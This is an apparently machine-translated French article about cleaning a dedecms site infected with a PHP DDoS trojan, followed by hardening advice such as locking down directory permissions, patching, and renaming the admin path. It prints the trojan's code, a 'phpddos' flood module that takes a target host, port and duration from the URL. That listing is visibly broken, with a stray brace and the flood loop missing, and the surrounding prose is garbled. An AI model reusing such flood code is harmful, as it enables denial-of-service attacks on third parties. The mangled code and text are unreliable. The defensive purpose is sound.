Comment dedecms résout la vulnérabilité de montage de chevaux DDOS

Comment les dedecms résolvent-ils la vulnérabilité de montage DDOS ?

Dedecms est un système open source PHP bien connu en Chine, et c'est également le système CMS de premier choix pour de nombreux webmasters pour créer des sites Web. Sa simplicité et sa facilité d'utilisation sont une raison majeure de son utilisation. praticité répandue, et c'est précisément à cause de l'open source de dedecms que cela a également conduit à De nombreux pirates informatiques se sont concentrés sur ce programme, ils ont donc successivement recherché de nombreuses vulnérabilités dedecms. En conséquence, un certain nombre de sites Web dedecms ont été suspendus. Certains ont été prévenus par la salle informatique, et des salles informatiques sérieuses ont été fermées de force, entraînant d'énormes pertes. Aujourd'hui, nous allons faire une analyse plus approfondie de ce problème et trouver une solution.

Étude recommandée : Dreamweaver cms

Caractéristiques du cheval piraté :

Ouvrez la page d'accueil de votre propre site Web et vous le trouverez en consultant le code source De nombreux codes de lien noir ont été ajoutés à mon site Web. Le code de lien noir est le plus simple et le plus facile à voir pour les webmasters. Ce n'est rien de plus que le code des liens conviviaux.

Une autre fonctionnalité est que lorsque vous ouvrez le site Web, 360 Security vous indiquera que le site Web présente un risque de malware. Ce type de code malveillant est généralement un code frame ou un code js ou un code image. c'est que le site Web ne parviendra soudainement pas à s'ouvrir ou s'ouvrira lentement. Si vous vérifiez le trafic, vous constaterez qu'il consomme beaucoup de trafic, ce qui signifie que le trafic est envoyé, ce qui est également appelé attaque par paquets de trafic UDP. . Ce qui précède présente les caractéristiques générales des dedecm piratés. Parlons de quelques solutions pratiques et mesures préventives en cas de piratage de sites Web.

Tout d'abord, téléchargez le code du programme du site Web sur votre ordinateur local et utilisez l'outil de suppression du cheval de Troie sinesafe pour le vérifier. Il s'avère qu'il existe de nombreux chevaux de Troie de script dans le répertoire data/cache/. le script du cheval de Troie, j'ai trouvé des codes PHP inconnus, j'ai mis le code dans l'outil cheval de Troie sinesafe et j'ai effectué une analyse approfondie et j'ai trouvé les caractéristiques du cheval de Troie. Le code est le suivant :

Le code est. comme suit :

<?php
set_time_limit(984918);
$host = $_GET[&#39;host&#39;];
$port = $_GET[&#39;port&#39;];
$exec_time = $_GET[&#39;time&#39;];
$Sendlen = 65535;
$packets = 0;
}
echo "================================================
";
echo " <font color=blue>www.phpddos.com
";
echo " SYN Flood 模块
";
echo " 作者：ybhacker
";
echo " 警告：本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font>
";
echo "================================================
";
echo " 攻击包总数：<font color=Red><span class=\"text\">".$packets." 个数据包</span>
</font>";
echo " 攻击总流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span>
</font>";
echo " 攻击总字节：<font color=Red><span class=\"text\">".time(&#39;h:i:s&#39;)." 字节</span>
</font>";
echo "Packet complete at ".time(&#39;h:i:s&#39;)." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

J'ai découvert sur Internet qu'il s'agissait d'un script php pour un cheval de Troie d'attaque de trafic UDP, ce cheval de Troie peut obtenir l'effet d'une attaque de trafic DDoS en s'exécutant avec l'autorisation du script du site Web. Aucune autorisation de serveur n'est requise. Ce n'est qu'à ce moment-là que j'ai compris pourquoi la salle informatique disait que mon site Web était toujours externalisé. Les sites Web exécutant ce script s'ouvriraient lentement, y compris mon site Web. Maintenant que vous avez trouvé le problème, vous devez le résoudre rapidement. Cliquez sur Effacer le code du cheval de Troie pour tout effacer en même temps. Il n'y a aucun nom de fichier inconnu dans le répertoire Data/cache/. Enfin, afin de guérir cette « maladie tenace », nous avons résumé plusieurs solutions et mesures préventives :

1. Paramètres de sécurité du répertoire dedecms : le répertoire data/cache/ templets uploads est paramétré en lecture et en écriture, mais pas les autorisations exécutables. Inclure, membre et plus définir les autorisations en lecture, exécutable et non en écriture Étant donné que dedecms n'utilise aucune procédure stockée, vous pouvez désactiver FILE, EXECUTE et d'autres autorisations pour effectuer des procédures stockées ou des opérations sur les fichiers.

2. Sécurité du programme du site Web : C'est également la précaution la plus fondamentale. S'il s'agit d'un espace virtuel, il est recommandé de trouver un professionnel de la maintenance de la sécurité du site Web pour assurer la sécurité du programme du site Web. le site Web peut apporter une source de clients sûre et stable.

3. Mise à jour du programme : ouvrez l'arrière-plan dedecms pour voir s'il existe des correctifs mis à jour. Si tel est le cas, veuillez les mettre à jour et les corriger à temps. Si votre version est très ancienne, je vous recommande de réinstaller la nouvelle version, car. Les nouvelles versions sont relativement sûres et diffèrent des anciennes versions à de nombreux endroits.

4. Répertoire de gestion du backend : dedecms Le répertoire de gestion du backend par défaut est généralement dedecms. De nombreux webmasters ne se soucient jamais de cette adresse du backend. Je suis très responsable de vous dire que si l'adresse du répertoire géré est celle par défaut, vous le ferez. être raccroché. La probabilité qu'un cheval soit présent est de %100. Il est recommandé de remplacer le nom du répertoire par un nom composé de chiffres et de lettres.

5. Mot de passe de gestion du site Web FTP : Il est recommandé de modifier fréquemment le mot de passe FTP et le mot de passe de gestion du site Web, car de nombreux pirates informatiques utilisent la force brute pour déchiffrer les mots de passe et rendre le mot de passe aussi complexe que possible avec des symboles et des lettres spéciaux. .

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!